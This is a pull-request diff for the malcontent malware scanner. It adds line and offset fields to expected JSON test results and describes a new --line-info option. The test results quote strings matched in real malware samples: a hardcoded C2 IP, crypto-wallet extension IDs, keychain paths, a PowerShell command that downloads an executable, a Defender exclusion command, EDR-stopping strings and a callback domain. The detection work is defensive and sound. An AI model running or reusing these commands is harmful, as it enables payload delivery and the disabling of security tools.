                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/JPCERT/lazarus.yara#Lazarus_jamistealer_str",
@@ -41,6 +45,10 @@
                         "ejbalbakoplchlghecdalmeeeajnimhm",
                         "aholpfdialjgjfhomihkjbmgjidlcdno"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 131,
+                    "EndingOffset": 525,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/elastic/Macos_Infostealer_Wallets.yar#Macos_Infostealer_Wallets_8e469ea0",
@@ -54,6 +62,10 @@
                     "MatchStrings": [
                         "ft hg"
                     ],
+                    "StartingLine": 1168,
+                    "EndingLine": 1168,
+                    "StartingOffset": 546,
+                    "EndingOffset": 550,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary",
@@ -73,6 +85,10 @@
                     "MatchStrings": [
                         "_PAGEZERO"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 41,
+                    "EndingOffset": 49,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/footer.yara#high_entropy_trailer",
@@ -85,6 +101,10 @@
                     "MatchStrings": [
                         "95.164.17.24"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 113,
+                    "EndingOffset": 124,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#bin_hardcoded_ip",
@@ -96,6 +116,10 @@
                     "MatchStrings": [
                         "http://95.164.17.24"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 106,
+                    "EndingOffset": 124,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url",
@@ -108,6 +132,10 @@
                         "Keychains",
                         "logkc_db"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 920,
+                    "EndingOffset": 946,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#login_keychain_eager_beaver",
@@ -127,6 +155,10 @@
                         "Roaming/",
                         ".config"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 564,
+                    "EndingOffset": 888,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/browser.yara#multiple_browser_refs",
@@ -150,6 +182,10 @@
                         "ebolmdjonilk",
                         "http"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 106,
+                    "EndingOffset": 522,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/wallet.yara#crypto_extension_stealer",
@@ -163,6 +199,10 @@
                         "/.config/google",
                         "/.config/opera"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 588,
+                    "EndingOffset": 859,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home-config.yara#home_config_path",
@@ -186,6 +226,10 @@
                         "/pdown",
                         "*.ldb"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 3614,
+                    "StartingOffset": 920,
+                    "EndingOffset": 604,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/malware/family/beaver_tail.yara#beaver_tail",
@@ -199,6 +243,10 @@
                         "Download Python Success",
                         "Download Client Success"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 1438,
+                    "EndingOffset": 1526,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download",
@@ -210,6 +258,10 @@
                     "MatchStrings": [
                         "http"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 106,
+                    "EndingOffset": 109,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -221,6 +273,10 @@
                     "MatchStrings": [
                         "multipart/form-data; boundary="
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 1318,
+                    "EndingOffset": 1347,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#form_data_reference",
@@ -232,6 +288,10 @@
                     "MatchStrings": [
                         "http://95.164.17.24"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 106,
+                    "EndingOffset": 124,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url",
@@ -243,6 +303,10 @@
                     "MatchStrings": [
                         "Upload LDB Finshed!!!"
                     ],
+                    "StartingLine": 263,
+                    "EndingLine": 263,
+                    "StartingOffset": 1387,
+                    "EndingOffset": 1407,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations",

--- a/tests/macOS/clean/ls.json
+++ b/tests/macOS/clean/ls.json
@@ -22,6 +22,10 @@
                         "http://crl.apple.com/codesigning.crl0",
                         "https://www.apple.com/appleca/0"
                     ],
+                    "StartingLine": 64,
+                    "EndingLine": 301,
+                    "StartingOffset": 110,
+                    "EndingOffset": 91,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url",
@@ -33,6 +37,10 @@
                     "MatchStrings": [
                         "TERM"
                     ],
+                    "StartingLine": 51,
+                    "EndingLine": 269,
+                    "StartingOffset": 165,
+                    "EndingOffset": 168,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM",
@@ -49,6 +57,10 @@
                         "_fts_open",
                         "_fts_set"
                     ],
+                    "StartingLine": 56,
+                    "EndingLine": 276,
+                    "StartingOffset": 4494,
+                    "EndingOffset": 804,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts",
@@ -60,6 +72,10 @@
                     "MatchStrings": [
                         "readlink"
                     ],
+                    "StartingLine": 56,
+                    "EndingLine": 276,
+                    "StartingOffset": 4991,
+                    "EndingOffset": 1050,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink",
@@ -72,6 +88,10 @@
                     "MatchStrings": [
                         "http"
                     ],
+                    "StartingLine": 64,
+                    "EndingLine": 301,
+                    "StartingOffset": 110,
+                    "EndingOffset": 57,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -83,6 +103,10 @@
                     "MatchStrings": [
                         "getenv"
                     ],
+                    "StartingLine": 56,
+                    "EndingLine": 276,
+                    "StartingOffset": 4641,
+                    "EndingOffset": 822,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv",

--- a/tests/npm/2024.noblox/postinstall.js.json
+++ b/tests/npm/2024.noblox/postinstall.js.json
@@ -14,6 +14,10 @@
                     "MatchStrings": [
                         "while(!![])"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 2429,
+                    "EndingOffset": 2439,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bool.yara#js_while_true_obfuscation",
@@ -1813,6 +1817,10 @@
                         "\\x5c",
                         "\\x22"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 11,
+                    "EndingOffset": 115059,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs",
@@ -2046,6 +2054,10 @@
                         "return _0xc65b7",
                         "return _0xa137f"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 1453,
+                    "EndingOffset": 114682,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/js.yara#js_hex_obfuscation",
@@ -2203,6 +2215,10 @@
                         "67-0x8",
                         "39*0x1"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 2461,
+                    "EndingOffset": 108765,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/strtoi.yara#sketchy_parseint_math",
@@ -2215,6 +2231,10 @@
                         "-parseInt(",
                         "+parseInt("
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 2541,
+                    "EndingOffset": 3328,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math",
@@ -2226,6 +2246,10 @@
                     "MatchStrings": [
                         "mkdir"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 113027,
+                    "EndingOffset": 113031,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir",
@@ -2238,6 +2262,10 @@
                     "MatchStrings": [
                         "C:/Wi"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 113980,
+                    "EndingOffset": 113984,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/windows_root.yara#windows_path",
@@ -2251,6 +2279,10 @@
                         "POST",
                         "http"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 90455,
+                    "EndingOffset": 114116,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post",
@@ -2262,6 +2294,10 @@
                     "MatchStrings": [
                         "webhook"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 64860,
+                    "EndingOffset": 90379,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/webhook.yara#webhook",
@@ -2273,6 +2309,10 @@
                     "MatchStrings": [
                         "else return!!"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 105700,
+                    "EndingOffset": 105712,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations",

--- a/tests/python/2024.yocolor/setup.py.json
+++ b/tests/python/2024.yocolor/setup.py.json
@@ -19,6 +19,10 @@
                         "https://",
                         "windows"
                     ],
+                    "StartingLine": 43,
+                    "EndingLine": 51,
+                    "StartingOffset": 46,
+                    "EndingOffset": 29,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref",
@@ -30,6 +34,10 @@
                     "MatchStrings": [
                         "fernet"
                     ],
+                    "StartingLine": 16,
+                    "EndingLine": 18,
+                    "StartingOffset": 11,
+                    "EndingOffset": 59,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/fernet.yara#crypto_fernet",
@@ -47,6 +55,10 @@
                         "import os",
                         "import re"
                     ],
+                    "StartingLine": 4,
+                    "EndingLine": 16,
+                    "StartingOffset": 16,
+                    "EndingOffset": 16,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/imports/python.yara#has_import",
@@ -58,6 +70,10 @@
                     "MatchStrings": [
                         "pip install fernet"
                     ],
+                    "StartingLine": 18,
+                    "EndingLine": 18,
+                    "StartingOffset": 42,
+                    "EndingOffset": 59,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/install_additional/pip_install.yara#pip_installer_fernet",
@@ -70,6 +86,10 @@
                     "MatchStrings": [
                         "os.system(f'start {sys.executable} -m pip install fernet')"
                     ],
+                    "StartingLine": 18,
+                    "EndingLine": 18,
+                    "StartingOffset": 4,
+                    "EndingOffset": 61,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#py_subprocess",
@@ -82,6 +102,10 @@
                     "MatchStrings": [
                         "open("
                     ],
+                    "StartingLine": 24,
+                    "EndingLine": 24,
+                    "StartingOffset": 8,
+                    "EndingOffset": 13,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open",
@@ -93,6 +117,10 @@
                     "MatchStrings": [
                         "/usr/bin/env"
                     ],
+                    "StartingLine": 1,
+                    "EndingLine": 1,
+                    "StartingOffset": 2,
+                    "EndingOffset": 13,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path",
@@ -104,6 +132,10 @@
                     "MatchStrings": [
                         "os.system(f'start {sys.executable} -m pip install fernet')"
                     ],
+                    "StartingLine": 18,
+                    "EndingLine": 18,
+                    "StartingOffset": 4,
+                    "EndingOffset": 61,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/py_setuptools.yara#setuptools_cmd_exec_start",
@@ -116,6 +148,10 @@
                         "https://github.com/tartley/yocolor",
                         "https://pypi.org/pypi?"
                     ],
+                    "StartingLine": 47,
+                    "EndingLine": 51,
+                    "StartingOffset": 9,
+                    "EndingOffset": 43,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url",
@@ -127,6 +163,10 @@
                     "MatchStrings": [
                         "fp.read()"
                     ],
+                    "StartingLine": 25,
+                    "EndingLine": 25,
+                    "StartingOffset": 15,
+                    "EndingOffset": 23,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read",
@@ -138,6 +178,10 @@
                     "MatchStrings": [
                         "sys.executable"
                     ],
+                    "StartingLine": 18,
+                    "EndingLine": 18,
+                    "StartingOffset": 23,
+                    "EndingOffset": 36,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/executable_path.yara#python_sys_executable",

--- a/tests/windows/2024.aspdasdksa2/callback.bat.json
+++ b/tests/windows/2024.aspdasdksa2/callback.bat.json
@@ -10,6 +10,10 @@
                     "MatchStrings": [
                         "System.Net.WebClient).DownloadFile('http"
                     ],
+                    "StartingLine": 14,
+                    "EndingLine": 20,
+                    "StartingOffset": 37,
+                    "EndingOffset": 76,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L52-L91",
@@ -25,6 +29,10 @@
                     "MatchStrings": [
                         "https://github.com/aspdasdksa2/callback/raw/main/Client-built.exe"
                     ],
+                    "StartingLine": 14,
+                    "EndingLine": 20,
+                    "StartingOffset": 73,
+                    "EndingOffset": 137,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/exe_url.yara#http_url_with_exe",
@@ -37,6 +45,10 @@
                         "github.com",
                         "raw/main"
                     ],
+                    "StartingLine": 14,
+                    "EndingLine": 20,
+                    "StartingOffset": 81,
+                    "EndingOffset": 120,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/github.yara#github_raw_user",
@@ -49,6 +61,10 @@
                         "https://",
                         "Windows"
                     ],
+                    "StartingLine": 14,
+                    "EndingLine": 21,
+                    "StartingOffset": 73,
+                    "EndingOffset": 34,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref",
@@ -60,6 +76,10 @@
                     "MatchStrings": [
                         "powershell -Command"
                     ],
+                    "StartingLine": 4,
+                    "EndingLine": 20,
+                    "StartingOffset": 4,
+                    "EndingOffset": 23,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell",
@@ -71,6 +91,10 @@
                     "MatchStrings": [
                         "C:\\Windows"
                     ],
+                    "StartingLine": 14,
+                    "EndingLine": 21,
+                    "StartingOffset": 142,
+                    "EndingOffset": 23,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/windows_root.yara#windows_path",
@@ -83,6 +107,10 @@
                         "alwarebytes",
                         "stopservice"
                     ],
+                    "StartingLine": 10,
+                    "EndingLine": 12,
+                    "StartingOffset": 28,
+                    "EndingOffset": 95,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/edr.yara#win_edr_stopper",
@@ -94,6 +122,9 @@
                     "MatchStrings": [
                         "powershell -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""
                     ],
+                    "StartingLine": 13,
+                    "EndingLine": 19,
+                    "EndingOffset": 62,
                     "RiskScore": 4,
                     "RiskLevel": "CRITICAL",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/win_defender.yara#win_defender_exclusion",
@@ -107,6 +138,10 @@
                         "malwarebytes_assistant",
                         "N \"Malwarebytes"
                     ],
+                    "StartingLine": 10,
+                    "EndingLine": 12,
+                    "StartingOffset": 11,
+                    "EndingOffset": 76,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/malware/ref.yara#malware",
@@ -118,6 +153,10 @@
                     "MatchStrings": [
                         "DownloadFile"
                     ],
+                    "StartingLine": 14,
+                    "EndingLine": 20,
+                    "StartingOffset": 59,
+                    "EndingOffset": 70,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download",
@@ -129,6 +168,10 @@
                     "MatchStrings": [
                         "https://github.com/aspdasdksa2/callback/raw/main/Client-built.exe"
                     ],
+                    "StartingLine": 14,
+                    "EndingLine": 20,
+                    "StartingOffset": 73,
+                    "EndingOffset": 137,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url",
@@ -140,6 +183,9 @@
                     "MatchStrings": [
                         "powershell -Command \"Start-Process -Verb RunAs -FilePath '%0' -ArgumentList 'a"
                     ],
+                    "StartingLine": 4,
+                    "EndingLine": 4,
+                    "EndingOffset": 81,
                     "RiskScore": 3,
                     "RiskLevel": "HIGH",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/runas.yara#runas_admin",
@@ -151,6 +197,10 @@
                     "MatchStrings": [
                         "taskkill"
                     ],
+                    "StartingLine": 16,
+                    "EndingLine": 22,
+                    "StartingOffset": 4,
+                    "EndingOffset": 11,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/terminate/taskkill.yara#taskkill",


### PR DESCRIPTION
had to change the test runner to a standard ubuntu runner vs. chainguard's hosted runner.

claude code helped me add the --line-info toggle. 

--line-info will only work if combined with --format json and --format yaml, and will produce output like:

```
{
    "Files": {
        "/Users/zaid/workspace/malware_tiny_samples/true_positives/python/malicious-datasets-guarddog-python/2024-11-14-ferminet-with-ecp-v94.6/tmp/tmpu08l3w5r/ferminet-with-ecp/ferminet_with_ecp-94.6/main.py": {
            "Path": "/Users/zaid/workspace/malware_tiny_samples/true_positives/python/malicious-datasets-guarddog-python/2024-11-14-ferminet-with-ecp-v94.6/tmp/tmpu08l3w5r/ferminet-with-ecp/ferminet_with_ecp-94.6/main.py",
            "SHA256": "b9ee11c9599535d0a417e10ad80a618d0276132dbdaa285876c9ad449846976c",
            "Size": 1952,
            "Behaviors": [
                {
                    "Description": "uploads content to security collaboration site",
                    "MatchStrings": [
                        "bfwstspuutiarcjzptf3c0cvb6yng6mw.oast.fun"
                    ],
                    "StartingLine": 48,
                    "EndingLine": 48,
                    "StartingOffset": 17,
                    "EndingOffset": 57,
                    "RiskScore": 3,
                    "RiskLevel": "HIGH",
                    "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/oob.yara#burp_collab",
                    "ID": "exfil/oob",
                    "RuleName": "burp_collab"
                }
            ],
            "RiskScore": 3,
            "RiskLevel": "HIGH"
        }
    }
}```